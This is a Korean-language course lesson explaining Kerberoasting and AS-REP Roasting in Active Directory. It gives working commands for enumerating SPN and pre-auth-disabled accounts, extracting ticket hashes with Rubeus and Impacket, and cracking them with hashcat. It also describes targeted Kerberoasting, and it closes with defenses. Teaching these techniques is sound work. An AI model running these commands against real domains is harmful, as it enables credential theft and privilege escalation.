Kerberoasting과 AS-REP Roasting
Kerberos 서비스 티켓을 요청하고 Hashcat으로 오프라인에서 크래킹합니다.
Kerberoasting과 AS-REP Roasting은(는) CoddyKit의 무료 Cyber Security Academy 강의입니다. 이것은 4개 중 3번째 강의입니다. 아래에서 전체 강의를 무료로 읽을 수 있으며, 내장 코드 에디터와 24/7 AI 튜터와 함께 브라우저에서 직접 실습할 수 있습니다. 이 강의는 Cyber Security Academy 학습 경로의 일부이며, 진행 상황이 웹과 CoddyKit 앱에 동기화됩니다. Cyber Security Academy 강의에는 총 4개의 강의가 포함되어 있습니다.
Kerberos 티켓 암호화
서비스 티켓은 서비스 계정의 암호 해시로 암호화됩니다. 모든 도메인 사용자는 모든 SPN에 대한 서비스 티켓을 요청할 수 있습니다. 서비스 계정의 암호가 취약하면 티켓을 오프라인에서 크래킹할 수 있습니다.
Kerberoasting이란 무엇입니까
Kerberoasting은 서비스 주체 이름(SPN)을 가진 계정의 서비스 티켓을 요청하고, 암호화된 티켓을 추출한 뒤 Hashcat으로 오프라인에서 크래킹합니다. 높은 권한이 필요하지 않으며 모든 도메인 사용자가 수행할 수 있습니다.
# Steps:
# 1. Find accounts with SPNs
# 2. Request their service tickets
# 3. Extract ticket hashes
# 4. Crack with HashcatSPN 찾기
PowerView, Impacket 또는 기본 제공 AD 도구를 사용해 SPN이 있는 모든 서비스 계정을 열거합니다. SPN은 서비스 계정과 해당 서비스의 연결 정보를 제공합니다.
# PowerView (Windows)
Get-DomainUser -SPN
Get-NetUser -SPN | select name,serviceprincipalname
# Impacket (Linux)
GetUserSPNs.py CORP/user:pass@dc.corp.com
# Native LDAP query
ldapsearch -H ldap://dc -b "DC=corp,DC=com" \
"(servicePrincipalName=*)" cn servicePrincipalName티켓 요청 및 추출
Rubeus(Windows)와 Impacket의 GetUserSPNs(Linux)는 모두 티켓을 요청하고 크래킹할 수 있는 형식으로 출력합니다.
# Rubeus (Windows)
Rubeus.exe kerberoast /format:hashcat /output:hashes.txt
# Impacket (Linux)
GetUserSPNs.py CORP/user:pass@dc.corp.com \
-request -outputfile hashes.txtHashcat으로 크래킹하기
Kerberoast 해시는 모드 13100(Kerberos 5 TGS-REP)을 사용합니다. 효과를 극대화하려면 규칙을 적용할 수 있는 강력한 단어 목록을 사용하십시오.
# Crack TGS-REP hashes
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt
# With rules for better coverage
hashcat -m 13100 hashes.txt rockyou.txt -r best64.rule
# AES tickets: mode 19700 (AES128) or 19800 (AES256)AS-REP 로스팅이란 무엇입니까
AS-REP 로스팅은 Kerberos 사전 인증이 필요하지 않음이 활성화된 계정을 대상으로 합니다. AS는 사용자의 해시로 암호화한 TGT를 반환하므로 암호를 몰라도 요청할 수 있으며, 오프라인에서 크래킹할 수 있습니다.
사전 인증이 비활성화된 계정 찾기
사전 인증이 없는 계정은 잘못된 구성으로, 오래된 애플리케이션 때문에 남아 있는 경우가 많습니다. PowerView 또는 GetNPUsers를 사용해 이러한 계정을 열거합니다.
# PowerView
Get-DomainUser -PreauthNotRequired
# Impacket GetNPUsers (no password needed!)
GetNPUsers.py CORP/ -usersfile users.txt \
-dc-ip dc.corp.com -format hashcat -outputfile asrep.txt
# Rubeus
Rubeus.exe asreproast /format:hashcat /output:asrep.txtAS-REP 해시 크래킹
AS-REP 해시는 Hashcat 모드 18200을 사용합니다. 크래킹 과정은 Kerberoasting과 같습니다. 암호화된 AS 응답을 대상으로 오프라인 사전 공격을 수행합니다.
# Crack AS-REP hashes
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
# With rules:
hashcat -m 18200 asrep.txt rockyou.txt -r best64.rule영향 평가
크래킹된 서비스 계정 암호에는 높은 권한이 부여된 경우가 많습니다. 데이터베이스, 백업 소프트웨어 또는 메일 시스템을 실행하는 서비스 계정이 도메인 관리자일 수 있습니다. AS-REP 계정은 자주 간과되며 보안 설정도 취약한 경우가 많습니다.
표적 Kerberoasting
개체에 쓰기 권한이 있다면 고가치 계정에 일시적으로 SPN을 추가하고, 해당 계정을 Kerberoasting한 다음 해시를 크래킹하고 SPN을 제거할 수 있습니다. 필요할 때 특정 계정을 대상으로 삼는 방식입니다.
방어 방법
Kerberoasting 방어를 위해 서비스 계정에는 길고 무작위적인 암호(25자 이상)를 사용하거나, 자동으로 교체되는 120자 암호를 사용하는 그룹 관리 서비스 계정(gMSA)을 사용하는 것이 좋습니다. AS-REP 공격을 막으려면 모든 계정에서 사전 인증을 활성화하십시오.
빠른 확인
AS-REP 로스팅이 작동하려면 어떤 계정 특성이 필요합니까?
요약: Kerberoasting과 AS-REP 로스팅
두 공격 모두 Kerberos 티켓 암호화의 약점을 악용해 계정 잠금을 유발하지 않고 오프라인에서 암호를 크래킹합니다. Kerberoasting은 SPN 계정을 대상으로 하며 모든 도메인 사용자가 수행할 수 있습니다. AS-REP 로스팅은 사전 인증이 없는 계정을 대상으로 하며 자격 증명이 필요하지 않습니다. 서비스 계정에는 gMSA를 사용하고 모든 사용자에게 사전 인증을 적용하여 방어해야 합니다.
AI 튜터와 함께 Cyber Security Academy을(를) 배우세요 — 무료
브라우저에서 실제 코드를 작성하고 실행하며, 24/7 AI 튜터로부터 즉각적인 도움을 받고, 웹이나 앱에서 중단한 부분부터 계속 학습하세요.
- 코스
- 76
- 레슨
- 303
자주 묻는 질문
“Kerberoasting과 AS-REP Roasting” 강의는 무료인가요?
네 — “Kerberoasting과 AS-REP Roasting” 전체 내용을 이 웹사이트에서 무료로 읽을 수 있습니다. 인터랙티브하게 실습하려면(내장 코드 에디터와 24/7 AI 튜터), CoddyKit PRO로 업그레이드하면 Cyber Security Academy 강의 전체를 잠금 해제할 수 있습니다. Cyber Security Academy 강의에는 총 4개의 강의가 포함되어 있습니다.
“Kerberoasting과 AS-REP Roasting”에서 뭘 배우나요?
Kerberos 서비스 티켓을 요청하고 Hashcat으로 오프라인에서 크래킹합니다. 브라우저에서 직접 실행하는 실습 코드로 Cyber Security Academy을(를) 배우며, 24/7 AI 튜터가 강의를 진행하면서 질문에 답변해줍니다.
Cyber Security Academy을(를) 시작하는 데 경험이 필요한가요?
사전 경험은 필요하지 않습니다. CoddyKit의 Cyber Security Academy은(는) 초급자부터 고급 학습자까지를 위해 구성되어 있으므로, 여기서 시작하거나 처음부터 시작할 수 있으며 자신의 속도대로 진행할 수 있습니다. 이것은 4개 중 3번째 강의입니다.
“Kerberoasting과 AS-REP Roasting” 강의는 얼마나 걸리나요?
대부분의 CoddyKit 강의는 약 5~10분이 소요됩니다. 각 강의는 간결하고 인터랙티브하여 꾸준한 진행이 가능하며, 웹과 앱에서 중단한 부분부터 바로 시작할 수 있습니다.
이 Cyber Security Academy 강의에서 코드를 작성하고 실행할 수 있나요?
네. 모든 Cyber Security Academy 강의에는 내장 코드 에디터가 포함되어 있으므로, 브라우저에서 바로 실제 코드를 작성하고 실행한 후 즉시 AI 피드백을 받을 수 있습니다 — 로컬 설정이 필요 없습니다.
이 강의의 모든 강의
- Windows 인증: NTLM과 Kerberos
- Pass-the-Hash와 Pass-the-Ticket 공격
- Kerberoasting과 AS-REP Roasting
- Active Directory 보안 강화